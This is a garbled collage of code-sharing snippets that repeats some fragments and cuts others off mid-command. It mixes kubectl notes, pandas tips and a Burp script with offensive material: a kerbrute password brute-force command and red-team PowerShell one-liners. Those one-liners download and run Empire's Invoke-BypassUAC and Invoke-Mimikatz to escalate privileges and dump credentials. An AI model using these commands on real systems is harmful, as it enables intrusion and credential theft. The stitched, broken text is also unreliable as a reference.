With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| ## Useful Commands | |
| Get kubectl version | |
| kubectl version | |
| Get cluster info: |
| // Get all users | |
| var url = "http://localhost:8080/api/v1/users"; | |
| var xhr = new XMLHttpRequest() | |
| xhr.open('GET', url, true) | |
| xhr.onload = function () { | |
| var users = JSON.parse(xhr.responseText); | |
| if (xhr.readyState == 4 && xhr.status == "200") { | |
| console.table(users); | |
| } else { | |
| console.error(users); |
| # List unique values in a DataFrame column | |
| df['Column Name'].unique() | |
| # To extract a specific column (subset the dataframe), you can use [ ] (brackets) or attribute notation. | |
| df.height | |
| df['height'] | |
| # are same thing!!! (from http://www.stephaniehicks.com/learnPython/pages/pandas.html | |
| # -or- | |
| # http://www.datacarpentry.org/python-ecology-lesson/02-index-slice-subset/) |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| import sys | |
| # Provides introspection into the Python Scripter API. | |
| apis = ('extender', 'callbacks', 'helpers', 'toolFlag', 'messageIsRequest', 'messageInfo') | |
| funcs = (type, dir) | |
| if messageIsRequest: | |
| for api in apis: | |
| print('\n{}:\n{}'.format(api, '='*len(api))) |
| # /dev/alias Pentest Environment Setup | |
| # Version: 0.2 (20131211) | |
| # Created By: Glenn 'devalias' Grant (http://devalias.net) | |
| # License: The MIT License (MIT) - Copyright (c) 2013 Glenn 'devalias' Grant (see http://choosealicense.com/licenses/mit/ for full license text) | |
| # TODO: | |
| # * Option to check if tools (from this script and external) exist/are already installed and what versions | |
| # * Eg nmap , metasploit, etc | |
| # * Lair: https://github.com/fishnetsecurity/Lair | |
| # * apt-get install python-pip |
| ----------------------------------------------------------------------------------------------------- | |
| #!/bin/bash | |
| set -o errexit | |
| set -o pipefail | |
| set -o nounset | |
| set -o xtrace | |
| # set -eox pipefail #safety for script | |
| ------------------------------------------------------------------------------------------ | |
| shell script | |
| $0 represent the shell script file name itself |
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |